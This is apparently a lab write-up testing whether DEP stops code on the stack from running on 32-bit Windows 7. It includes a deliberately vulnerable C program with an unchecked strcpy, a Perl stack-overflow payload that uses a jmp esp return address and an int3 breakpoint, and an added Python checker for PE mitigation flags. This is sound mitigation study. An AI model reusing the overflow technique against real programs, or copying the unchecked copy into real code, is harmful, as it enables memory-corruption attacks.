DEP on vs. DEP off
Test environment: Win7 32-bit
Test code:
#include "stdafx.h"
#include <string.h>

// Deliberately vulnerable test program: argv[1] is copied into a fixed
// 500-byte stack buffer with no length check. The project is built as a
// non-Unicode (char) project, so _TCHAR is char and strcpy applies directly.
int _tmain(int argc, _TCHAR* argv[])
{
    char buf[500];
    buf[499] = 0xbb;        // write a marker byte into the buffer
    strcpy(buf, argv[1]);   // the overflow under test
    return 0;
}
To rule out interference from other security mechanisms, GS, RTC and ASLR were disabled in VS2008. DEP was enabled both in the system settings and in the compiler options (/NXCOMPAT).
Test script:
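Whether a given binary actually opted in to DEP at link time can be read straight from its PE header: the linker's /NXCOMPAT switch sets the IMAGE_DLLCHARACTERISTICS_NX_COMPAT bit (0x0100) in the optional header's DllCharacteristics field, next to the DYNAMIC_BASE bit (0x0040) that ASLR uses. The following checker is an added example and is not code from the original post; it parses that field from either a file on disk or an in-memory image. Because no test.exe ships with the post, the script constructs a minimal, non-loadable PE32 header of its own (build_minimal_pe, a helper invented here) to exercise the parser.

```python
import struct

# DllCharacteristics bits (documented in the PE/COFF specification)
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # linker /DYNAMICBASE -> ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # linker /NXCOMPAT    -> DEP opt-in

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
DLLCHARACTERISTICS_OFFSET = 70   # same offset in PE32 and PE32+ optional headers


def pe_mitigation_flags(image: bytes) -> dict:
    """Return which DEP/ASLR opt-in bits are set in a PE image's optional header."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image (missing MZ signature)")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4                       # 20-byte COFF file header
    (size_of_optional,) = struct.unpack_from("<H", image, coff + 16)
    if size_of_optional < DLLCHARACTERISTICS_OFFSET + 2:
        raise ValueError("optional header too short to carry DllCharacteristics")
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (dll_chars,) = struct.unpack_from("<H", image, opt + DLLCHARACTERISTICS_OFFSET)
    return {
        "pe32plus": magic == PE32PLUS_MAGIC,
        "nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "dynamic_base": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
    }


def describe(image: bytes) -> str:
    """One-line human-readable summary of the opt-in bits."""
    f = pe_mitigation_flags(image)
    dep = "opted in (/NXCOMPAT)" if f["nx_compat"] else "not opted in"
    aslr = "opted in (/DYNAMICBASE)" if f["dynamic_base"] else "not opted in"
    return "DEP: %s; ASLR: %s" % (dep, aslr)


def check_file(path: str) -> str:
    """Read a PE file from disk (e.g. the test.exe from the post) and summarise it."""
    with open(path, "rb") as fh:
        return describe(fh.read())


def build_minimal_pe(dll_characteristics: int) -> bytes:
    """Constructed sample: a bare PE32 header (not loadable) with the given
    DllCharacteristics, used here only so the parser can be run offline."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF header: Machine=i386, 0 sections, SizeOfOptionalHeader=0xE0, Characteristics=EXECUTABLE|32BIT
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<H", opt, 68, 3)                   # Subsystem: console
    struct.pack_into("<H", opt, DLLCHARACTERISTICS_OFFSET, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Two constructed images: one linked without mitigations, one with both bits set.
    print("no flags :", describe(build_minimal_pe(0)))
    print("both bits:", describe(build_minimal_pe(
        IMAGE_DLLCHARACTERISTICS_NX_COMPAT | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)))
```

One caveat when reading the result: the NX_COMPAT bit is what the loader consults under the default client "OptIn" DEP policy, where only images carrying the bit (plus Windows system binaries) get a non-executable stack. If the system policy is set to "AlwaysOn", as the post's system-wide setting implies, DEP applies to every 32-bit process regardless of the bit, so a binary reporting "not opted in" can still have its stack protected.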
# just a demo for testing DEP.
my $shellcode = "A" x 508;                        # padding up to the saved return address
#$shellcode = $shellcode . "BBBB";
$shellcode = $shellcode . pack("V", 0x7602f7f7);  # address of a `jmp esp` trampoline; before running the script, locate a usable one with findjmp.exe and fill it in here
$shellcode = $shellcode . "\x90\x90\x90\xcc";    # NOP sled plus an int3 so the debugger breaks if code on the stack executes
#system("\"C:\\Program Files\\Debugging Tools for Windows (x86)\\windbg\" test.exe \"$shellcode\"\r\n");
system("\"C:\\OllyDbg 2.0\\ollydbg\" test.exe \"$shellcode\"\r\n");
DEP off
Instructions on the stack execute without any trouble.
DEP on
The program can execute the `jmp esp` inside kernel32.dll, and then jumps to the location shown here:
Single-stepping once more lands here:
Execution of the code on the stack fails.